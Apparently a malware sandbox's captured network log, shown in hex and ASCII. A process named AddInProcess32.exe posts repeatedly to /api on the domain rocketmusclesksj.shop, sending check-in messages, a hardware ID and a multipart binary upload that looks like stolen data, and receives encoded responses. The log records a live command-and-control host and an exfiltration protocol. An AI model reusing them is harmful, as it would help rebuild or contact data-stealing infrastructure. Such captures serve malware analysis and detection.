2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 38 9d 07 89 07 1d c6 0d e6 39 d0 bd 9e 59 b8 d6 8f bc 63 c2 ff 80 ca 14 b0 c1 46 18 57 aa 27 8a a4 f8 5d 29 02 bf 39 cb 67 9e df 24 e6 a1 2b 05 ef fb 22 ca 60 fb 78 11 b9 90 20 da ef d1 28 c3 99 8b cb f7 92 78 a6 24 e0 80 df 82 7b 90 a2 c3 f0 8a 97 4e 5f 75 cd 58 2c 10 a1 df 98 22 e9 fa cc c9 f8 2e 45 5b 02 a8 b6 14 27 1a 0b 8c 7a e2 ac fe 25 75 e9 dc d6 37 99 77 a3 40 a6 66 d4 d1 75 f4 68 2b 37 a3 f3 2d 90 76 d4 a3 c2 88 de 65 94 58 69 3e e3 7f a9 be c6 44 bb 23 86 06 b9 57 ba 35 0e 00 43 e1 cf 9c 20 27 ec 51 f6 ca fe d3 9a f0 e4 18 81 c2 c5 06 f4 c9 3f ba 2f 58 b3 09 bb a7 59 6e 24 f4 5e 0b 5a ce 34 27 f2 5e 15 c7 9f 14 7d 3b d9 50 e7 c3 37 03 ae f2 80 af 60 33 91 33 49 0b a8 1b 50 43 62 44 2a 0d 8d 60 f2 0b c7 ea 54 41 f7 a5 14 cf 7d ea c5 8c 14 61 6b Data Ascii: 89YcFW'])9g$+"`x (x${N_uX,".E['z%u7w@fuh+7-veXi>D#W5C 'Q?/XYn$^Z4'^};P7`33IPCbD*`TA}ak
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 76 4f d6 08 7a 09 9d 50 ea 04 56 e5 af 5c c4 23 e4 3f 77 ef 40 30 5d 33 07 04 2b 8b 5f 25 8b 69 05 48 e8 07 87 4e fc fd c4 ac 61 04 e6 06 53 c6 91 bb 78 ab f4 20 69 e6 c3 e6 84 e4 7a 82 28 6e 8a d2 8e 31 ee 5b 26 1d 1a 2c 46 ca fb 4a 6f 57 47 e5 e8 18 32 c9 67 97 ab 6a f9 ec a8 60 ef 32 fa 45 e3 fb 30 82 8d a9 21 12 72 77 44 8f 70 0f 96 d2 1d f0 46 6c 17 f9 22 16 88 5e 6b d3 83 5f 1f 43 1f 3e 29 a8 a2 10 16 56 2c b1 83 1c ab d0 b5 3d f1 f3 97 b4 61 0d 0a d7 23 c1 6c a3 f4 c5 98 e4 2a 96 e6 52 ad 78 87 fa eb ba b4 bf 51 0e 34 f6 af f8 da 11 ba df b8 20 1d 9a 9c 8a f5 f4 12 13 d8 2b 87 2a 60 c7 1a 60 18 74 46 1c ec 92 f5 9b 7e 1b 80 9a 46 21 b8 44 c2 ab 7c 9f 29 62 21 3e ec b9 a0 a0 45 c3 2a a2 15 9f b1 6b 5b 61 d1 a5 6b 5e 10 40 35 8a 71 34 3f 93 41 0b 9d Data Ascii: vOzPV\#?w@0]3+_%iHNaSx iz(n1[&,FJoWG2gj`2E0!rwDpFl"^k_C>)V,=a#lRxQ4 +``tF~F!D\|)b!>E*k[ak^@5q4?A
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 0c db 02 e8 c0 da 79 9f 50 cb 6e de 00 5b f8 bc cd 4f e4 d3 03 34 50 fb c7 05 76 23 c7 f5 c8 da c8 4e 54 e0 33 6e b7 07 89 1f 08 a7 c2 8c dc e4 df 5b c5 f0 3d e7 d3 50 92 d6 21 8c e0 ca 33 75 b3 ef 77 31 ca 1e 6b a2 ff 85 5d 60 fb bf e8 f0 26 ba 95 f9 66 4a 45 9c 1f b0 55 d7 68 b4 0b 9b 9f 5b 37 2d bd ac b3 76 5c 1d 68 25 6f 4b 34 76 d4 a0 b8 50 5d df 5c 9e a5 0f 11 31 e6 13 b2 2f 04 42 17 65 ee 7a 98 a1 be 47 3f 7b 22 94 75 a7 4e de 32 42 6a ef b6 63 cc 79 36 ad f8 69 c9 20 c6 ad 97 0d f3 07 7d 97 63 9c f9 fd 13 24 90 1d 3c b5 73 8d 82 c4 83 f1 49 4e 1a 0a 8f 76 a7 69 43 d2 de c9 6b 25 73 1f f2 e1 0a 9d 40 62 85 46 86 00 64 15 e8 5d 37 08 12 8b 1d 8c ff 0c 7c f9 17 f0 a2 86 7d f7 64 15 3a c9 02 d6 72 2b b1 1a 47 3e 2c 33 a1 f8 20 e6 09 1d 80 a3 14 d1 3b Data Ascii: yPn[O4Pv#NT3n[=P!3uw1k]`&fJEUh[7-v\h%oK4vP]\1/BezG?{"uN2Bjcy6i }c$<sINviCk%s@bFd]7\|}d:r+G>,3 ;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:15 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: rocketmusclesksj.shop
2024-04-20 11:23:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-04-20 11:23:15 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t4kte352ednkk2l4ajmiihm92p; expires=Wed, 14-Aug-2024 05:09:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgTUEKU1Ce5X%2Bml65K21nVAXiRx8TgkzuzKMHAO%2BisJ1UoSs57ZLmsf9yjxOdgNTS3rOQXmsmjtLmsgl2Al05CAeehr5aXm15u3QFgWqEDx3J%2FxRhystKBvr6ONFPNdj19SF9%2FYHvF8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2ddbb6d4584-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-04-20 11:23:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:16 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: rocketmusclesksj.shop
2024-04-20 11:23:16 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 39 39 4d 75 41 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=A99MuA--&j=default
2024-04-20 11:23:16 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f8bikn707lcujnm9einlahf3hs; expires=Wed, 14-Aug-2024 05:09:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgNp0o1LLT9VBxzx02U4TArlGJ58HPIkDn4X1Ti4GKLCeiZo9TLFHdXvwbZ3vY6evSH%2FVBkUH1daZcja1Ud9TuFWNhPROE8xGVGwKYRBz9j1Gwt1cAb%2FgNLEg%2BgtoLNARpL3T%2F9QLVk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2e2cd2f07d6-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:16 UTC	561	IN	Data Raw: 35 30 35 0d 0a 42 74 6d 36 38 39 57 65 4a 38 35 67 67 65 52 4c 6a 77 35 35 37 59 6a 32 6e 67 54 4c 5a 57 33 66 64 34 4a 73 2f 37 65 59 75 73 39 39 30 37 50 52 6f 37 77 64 37 6c 53 74 37 6b 4b 74 66 52 7a 50 73 74 62 71 64 72 34 41 51 64 56 2b 6f 41 32 62 6c 61 4b 61 71 57 65 31 79 5a 62 35 6c 43 37 73 44 66 6e 47 63 61 39 56 63 2b 54 7a 2f 4a 63 4e 36 51 41 44 2f 55 32 69 54 6f 6a 53 2b 74 2b 33 63 72 7a 55 67 4c 7a 78 53 59 34 4e 35 4a 41 71 34 6d 38 4b 68 71 61 66 38 53 62 6e 62 32 54 57 56 65 63 57 33 59 32 34 6d 49 4a 6a 72 64 75 2b 74 4f 31 4d 37 45 79 4c 37 55 4b 74 61 77 33 50 73 74 61 38 57 4f 6b 56 44 4b 30 57 37 78 2b 6a 6c 61 4c 42 6b 79 53 77 7a 70 61 6e 2f 31 4f 6e 44 2b 2b 58 46 36 30 30 54 39 32 34 78 71 34 30 74 6b 64 6e 31 67 71 49 5a 61 Data Ascii: 505Btm689WeJ85ggeRLjw557Yj2ngTLZW3fd4Js/7eYus9907PRo7wd7lSt7kKtfRzPstbqdr4AQdV+oA2blaKaqWe1yZb5lC7sDfnGca9Vc+Tz/JcN6QAD/U2iTojS+t+3crzUgLzxSY4N5JAq4m8Khqaf8Sbnb2TWVecW3Y24mIJjrdu+tO1M7EyL7UKtaw3Psta8WOkVDK0W7x+jlaLBkySwzpan/1OnD++XF600T924xq40tkdn1gqIZa
2024-04-20 11:23:16 UTC	731	IN	Data Raw: 2b 34 44 54 39 2f 70 4c 72 51 2f 6a 6c 43 48 6d 5a 78 36 64 34 5a 33 78 61 36 6b 4b 42 62 49 57 34 41 6d 58 33 2f 58 53 71 57 6d 32 33 70 47 33 76 41 76 45 61 59 6a 47 4c 76 55 73 51 38 32 71 74 2f 6c 32 72 67 73 5a 2f 79 2b 67 5a 76 62 4b 74 4c 50 76 4a 74 4f 7a 69 4e 2b 58 4c 75 77 46 37 38 5a 78 72 79 77 54 69 75 6d 58 39 32 6d 71 44 77 53 76 46 66 49 49 6b 4e 44 6f 33 71 68 71 73 64 75 44 76 66 4a 44 72 77 76 6f 6a 79 7a 71 61 46 76 42 67 76 2b 58 4a 71 34 66 54 2b 56 58 6f 43 2b 51 33 76 62 53 75 6d 54 37 73 50 71 6f 73 69 33 48 47 34 76 74 51 71 31 72 46 38 2b 79 31 72 78 69 71 41 4d 4f 75 52 76 75 43 70 48 54 39 4e 57 69 59 72 48 59 6c 72 33 30 54 61 30 50 36 49 6b 70 36 47 45 66 69 65 61 56 2b 53 62 6e 62 32 54 57 56 65 63 57 33 59 32 34 6d 49 4e Data Ascii: +4DT9/pLrQ/jlCHmZx6d4Z3xa6kKBbIW4AmX3/XSqWm23pG3vAvEaYjGLvUsQ82qt/l2rgsZ/y+gZvbKtLPvJtOziN+XLuwF78ZxrywTiumX92mqDwSvFfIIkNDo3qhqsduDvfJDrwvojyzqaFvBgv+XJq4fT+VXoC+Q3vbSumT7sPqosi3HG4vtQq1rF8+y1rxiqAMOuRvuCpHT9NWiYrHYlr30Ta0P6Ikp6GEfieaV+Sbnb2TWVecW3Y24mIN
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 33 34 65 37 0d 0a 64 2b 58 57 75 4a 71 69 4a 39 42 68 67 64 62 69 4f 62 55 70 43 54 70 41 51 4f 34 47 75 34 4f 6b 39 54 33 33 71 6c 70 75 38 71 58 70 66 74 45 72 77 48 6c 67 79 33 74 62 52 36 4b 37 70 7a 34 61 71 5a 48 51 64 56 2b 69 30 36 61 7a 62 71 41 37 79 53 55 7a 35 2b 68 39 31 47 72 45 76 4b 38 61 39 68 76 46 59 48 74 67 72 77 4f 77 68 68 42 31 58 37 35 5a 76 61 2b 75 74 2b 68 4a 4f 4f 61 30 62 37 75 56 36 67 45 36 49 30 37 2f 32 59 66 6a 75 75 54 38 32 65 69 41 67 4f 33 48 75 51 63 6c 64 7a 35 79 71 6c 6b 73 4e 4b 58 39 37 49 74 78 32 6d 6a 67 54 47 74 4e 46 6e 50 7a 70 6e 73 61 71 49 52 43 4b 30 67 34 77 43 54 30 75 79 59 78 51 2b 6b 6c 76 6e 63 35 53 33 48 61 61 4f 42 4a 61 30 30 57 63 2f 6c 6d 2f 4e 75 71 51 59 4c 73 42 48 68 41 35 48 63 2b 64 Data Ascii: 34e7d+XWuJqiJ9BhgdbiObUpCTpAQO4Gu4Ok9T33qlpu8qXpftErwHlgy3tbR6K7pz4aqZHQdV+i06azbqA7ySUz5+h91GrEvK8a9hvFYHtgrwOwhhB1X75Zva+ut+hJOOa0b7uV6gE6I07/2YfjuuT82eiAgO3HuQcldz5yqlksNKX97Itx2mjgTGtNFnPzpnsaqIRCK0g4wCT0uyYxQ+klvnc5S3HaaOBJa00Wc/lm/NuqQYLsBHhA5Hc+d
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 6d 74 47 48 38 55 6d 6e 44 71 47 7a 4b 75 4e 69 48 4a 6d 71 2f 4a 64 35 35 32 39 6b 70 48 32 4c 5a 64 33 53 39 70 6a 31 4a 76 76 58 6b 4c 72 32 54 71 49 4f 34 6f 59 74 37 6d 59 62 67 4f 2b 53 39 47 2b 70 46 51 69 79 46 4f 45 46 6c 74 6a 30 33 61 78 68 76 4a 6a 66 33 35 63 75 37 41 58 37 78 6e 47 76 4c 44 61 6d 30 4e 53 55 44 62 5a 4a 5a 39 59 4d 69 47 58 32 6c 66 33 55 37 54 7a 35 6d 4a 57 39 2f 45 69 6d 43 65 79 46 4c 75 4e 73 46 6f 58 34 6e 50 78 6d 70 77 45 4f 73 52 44 68 41 70 37 48 39 74 36 67 59 72 50 4b 30 66 6d 55 4c 73 64 43 35 4a 35 70 74 53 35 62 72 2b 47 59 2f 32 71 6f 41 45 32 63 48 2b 4d 46 6b 5a 66 50 32 36 4e 71 76 4d 37 52 33 35 64 61 34 6d 71 49 6e 30 47 47 42 31 75 49 35 74 53 6b 4a 4f 6b 44 43 37 45 56 35 77 43 5a 30 2f 66 66 70 6d 6d Data Ascii: mtGH8UmnDqGzKuNiHJmq/Jd5529kpH2LZd3S9pj1JvvXkLr2TqIO4oYt7mYbgO+S9G+pFQiyFOEFltj03axhvJjf35cu7AX7xnGvLDam0NSUDbZJZ9YMiGX2lf3U7Tz5mJW9/EimCeyFLuNsFoX4nPxmpwEOsRDhAp7H9t6gYrPK0fmULsdC5J5ptS5br+GY/2qoAE2cH+MFkZfP26NqvM7R35da4mqIn0GGB1uI5tSkJOkDC7EV5wCZ0/ffpmm
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 76 6c 44 72 51 66 6d 68 79 33 68 5a 68 32 4d 36 5a 76 7a 61 61 46 48 51 64 56 2b 69 30 36 61 7a 62 71 41 37 79 53 65 7a 35 71 35 2b 67 58 45 61 66 7a 49 51 59 5a 31 63 2b 53 42 31 50 74 71 36 56 39 4e 2f 52 6e 70 43 4a 76 51 39 74 6d 72 62 4c 37 51 6c 62 62 36 51 36 38 4e 35 34 4d 6f 34 6d 67 58 67 65 43 56 2f 57 71 69 43 41 53 34 56 61 35 6d 39 72 36 36 33 37 55 6b 34 35 72 52 68 76 39 54 75 78 4c 76 78 6b 47 47 63 31 58 6e 67 59 32 55 44 63 4a 48 43 4c 46 56 75 45 7a 64 31 4f 6a 53 70 32 71 2b 31 35 53 30 38 30 4b 68 42 4f 2b 4d 49 4f 56 71 46 49 62 34 6c 2f 42 6f 72 67 6b 44 73 78 6a 71 44 5a 43 56 74 4c 44 47 44 2f 76 66 69 66 65 6b 42 2b 77 75 35 49 73 48 35 6d 41 63 7a 34 4c 2f 34 79 6a 42 62 42 62 56 66 6f 74 4f 6d 74 6d 36 67 4f 38 6b 74 39 4b 64 Data Ascii: vlDrQfmhy3hZh2M6ZvzaaFHQdV+i06azbqA7ySez5q5+gXEafzIQYZ1c+SB1Ptq6V9N/RnpCJvQ9tmrbL7Qlbb6Q68N54Mo4mgXgeCV/WqiCAS4Va5m9r6637Uk45rRhv9TuxLvxkGGc1XngY2UDcJHCLFVuEzd1OjSp2q+15S080KhBO+MIOVqFIb4l/BorgkDsxjqDZCVtLDGD/vfifekB+wu5IsH5mAcz4L/4yjBbBbVfotOmtm6gO8kt9Kd
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 6b 44 36 34 77 68 34 6d 4d 4a 6a 75 57 64 2b 32 32 6b 43 41 47 34 47 2f 49 4a 6c 74 37 79 30 61 4e 69 2b 35 62 35 33 4a 63 46 71 78 71 6a 33 6d 75 74 57 68 69 42 34 59 58 7a 5a 61 56 48 5a 39 59 4b 72 6d 62 32 7a 4a 4b 7a 78 69 53 38 31 4e 48 76 76 67 57 67 44 4f 4f 4a 4a 65 46 6e 45 34 37 6d 6d 76 74 6a 6f 41 38 48 72 78 54 6b 42 70 7a 62 39 64 6d 70 59 62 37 63 6c 72 50 36 53 75 78 4d 69 2b 31 43 72 57 73 44 7a 37 4c 57 76 45 6d 75 45 69 36 48 56 59 68 6c 67 70 75 53 73 37 51 4d 30 4c 50 52 73 50 41 46 39 45 43 6a 6a 43 4c 70 62 78 2b 4b 35 5a 58 39 59 4c 73 41 42 71 38 62 37 51 47 56 33 66 50 5a 71 57 47 32 33 70 32 39 2f 55 4b 69 44 4f 76 47 5a 34 55 48 63 4d 2f 74 6a 4c 77 2b 36 30 63 75 72 51 37 79 47 4a 44 30 39 39 66 74 44 4e 44 48 33 39 2b 58 58 Data Ascii: kD64wh4mMJjuWd+22kCAG4G/IJlt7y0aNi+5b53JcFqxqj3mutWhiB4YXzZaVHZ9YKrmb2zJKzxiS81NHvvgWgDOOJJeFnE47mmvtjoA8HrxTkBpzb9dmpYb7clrP6SuxMi+1CrWsDz7LWvEmuEi6HVYhlgpuSs7QM0LPRsPAF9ECjjCLpbx+K5ZX9YLsABq8b7QGV3fPZqWG23p29/UKiDOvGZ4UHcM/tjLw+60curQ7yGJD099ftDNDH39+XX
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 55 4c 4f 52 6b 48 34 62 71 6b 50 5a 72 72 67 63 4b 73 42 44 6b 41 4a 6e 53 2b 74 53 69 59 37 50 58 6c 62 66 7a 42 65 4a 71 69 4f 31 70 36 6e 52 62 31 36 6a 55 33 47 32 2f 4a 67 47 32 42 36 42 6d 39 73 71 30 73 4d 5a 39 30 37 50 36 39 2f 74 4a 37 46 71 68 78 69 66 6b 62 52 4f 42 35 70 7a 34 64 4b 6b 4d 42 72 49 55 37 77 36 65 31 50 44 51 76 32 4b 37 30 35 6d 77 39 45 47 69 45 4f 4b 4a 61 61 4d 45 63 4f 53 71 6b 2b 51 6d 38 55 56 50 6a 41 50 6e 43 5a 4b 58 30 39 2b 32 5a 62 48 62 6d 72 75 38 4c 63 63 64 72 65 35 43 39 41 52 77 35 4b 71 54 38 43 62 78 52 55 2b 77 47 65 30 4b 6a 39 6e 36 32 4b 52 6a 73 63 71 65 75 50 46 47 72 41 66 78 68 7a 76 69 5a 78 36 4d 37 70 76 7a 61 71 45 4e 54 2f 4e 39 69 32 58 64 30 75 4b 59 39 53 62 37 39 4a 4b 6d 39 67 65 4c 47 50 Data Ascii: ULORkH4bqkPZrrgcKsBDkAJnS+tSiY7PXlbfzBeJqiO1p6nRb16jU3G2/JgG2B6Bm9sq0sMZ907P69/tJ7FqhxifkbROB5pz4dKkMBrIU7w6e1PDQv2K705mw9EGiEOKJaaMEcOSqk+Qm8UVPjAPnCZKX09+2ZbHbmru8Lccdre5C9ARw5KqT8CbxRU+wGe0Kj9n62KRjscqeuPFGrAfxhzviZx6M7pvzaqENT/N9i2Xd0uKY9Sb79JKm9geLGP
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 61 77 50 50 73 74 61 38 52 62 34 52 42 61 5a 56 69 47 57 43 6d 35 4b 7a 74 41 7a 51 73 39 47 77 38 41 58 30 51 4b 4f 4c 4c 75 4e 6b 48 59 48 73 68 76 42 70 72 77 63 4f 74 78 6a 73 42 5a 72 62 38 64 36 6f 61 62 76 65 6c 37 50 34 51 61 49 42 6f 38 68 42 68 67 64 62 69 50 4c 55 70 43 54 70 49 43 4b 4d 56 38 4d 5a 69 39 2f 39 31 4c 74 76 75 74 75 48 75 75 77 46 78 47 6e 38 79 45 47 47 64 58 50 6b 67 64 54 37 61 75 6c 66 54 66 30 65 37 67 75 63 32 66 44 66 6f 33 61 36 30 70 32 32 2b 30 4b 6e 45 4f 69 55 49 75 56 76 46 59 66 6a 6c 50 4a 6d 71 41 6f 50 2f 56 75 49 5a 66 61 56 2f 63 44 74 50 50 6d 59 74 4a 54 72 55 36 5a 41 77 4a 45 2f 35 32 73 58 6d 65 47 56 2f 33 43 6b 46 30 2f 56 66 76 39 41 39 62 37 6a 73 4d 59 50 2b 39 2b 64 39 36 51 48 37 41 6e 73 69 43 54 Data Ascii: awPPsta8Rb4RBaZViGWCm5KztAzQs9Gw8AX0QKOLLuNkHYHshvBprwcOtxjsBZrb8d6oabvel7P4QaIBo8hBhgdbiPLUpCTpICKMV8MZi9/91LtvutuHuuwFxGn8yEGGdXPkgdT7aulfTf0e7guc2fDfo3a60p22+0KnEOiUIuVvFYfjlPJmqAoP/VuIZfaV/cDtPPmYtJTrU6ZAwJE/52sXmeGV/3CkF0/Vfv9A9b7jsMYP+9+d96QH7AnsiCT
2024-04-20 11:23:16 UTC	1369	IN	Data Raw: 36 54 38 6c 77 33 70 41 78 37 39 54 61 4a 65 7a 34 36 76 69 2f 6f 30 36 62 44 36 71 4c 49 74 78 78 75 4c 37 55 4b 74 65 6c 76 58 71 4d 61 79 44 73 4a 73 54 36 39 56 75 45 7a 64 6b 76 54 56 72 47 65 31 32 34 4f 6c 2b 6b 61 36 41 61 53 34 46 38 78 68 45 49 50 6e 6d 2f 64 59 6c 79 59 43 74 68 6e 74 41 5a 62 72 78 4d 32 75 61 72 58 66 68 36 61 38 43 38 52 70 69 4d 59 6d 72 54 52 5a 74 71 72 63 76 46 6e 6e 62 32 54 57 56 66 68 4f 78 5a 65 36 37 61 35 71 74 64 2b 48 70 72 46 6b 6f 51 6e 76 69 79 62 6d 4c 46 58 6e 67 66 2b 38 59 4f 6c 66 54 65 31 62 69 47 58 32 6c 66 37 4a 37 54 7a 35 69 4d 50 73 71 52 62 37 55 72 48 75 51 76 49 69 63 2b 54 7a 2f 4a 63 4e 36 52 46 50 35 56 65 79 51 50 57 2b 6b 5a 69 2f 4a 4f 4f 61 30 66 44 2f 56 37 34 45 34 4a 41 71 71 6c 49 6c Data Ascii: 6T8lw3pAx79TaJez46vi/o06bD6qLItxxuL7UKtelvXqMayDsJsT69VuEzdkvTVrGe124Ol+ka6AaS4F8xhEIPnm/dYlyYCthntAZbrxM2uarXfh6a8C8RpiMYmrTRZtqrcvFnnb2TWVfhOxZe67a5qtd+HprFkoQnviybmLFXngf+8YOlfTe1biGX2lf7J7Tz5iMPsqRb7UrHuQvIic+Tz/JcN6RFP5VeyQPW+kZi/JOOa0fD/V74E4JAqqlIl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:16 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: rocketmusclesksj.shop
2024-04-20 11:23:16 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 34 46 35 36 33 30 34 38 43 31 34 35 30 33 46 39 46 44 32 42 45 32 43 39 32 35 30 44 46 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 39 39 4d 75 41 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CD4F563048C14503F9FD2BE2C9250DFD--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"A99MuA----b
2024-04-20 11:23:16 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-04-20 11:23:17 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9pgn1bha5t7ai23rrca071prkp; expires=Wed, 14-Aug-2024 05:09:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpIVEBt8bC9nr8aBYHJK4v686Pg1hwj5tC23tvY1MfYbG4hDp1FgbHN%2Bv%2BZx5ZICopHufIAWmP80dmsqylL0iFiDxqnuSBhu9M9CSwh0ViMDnujjvs3gwISKUYBotwhTL2NDv3FZTGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2e71e69678a-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 11:23:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:18 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: rocketmusclesksj.shop
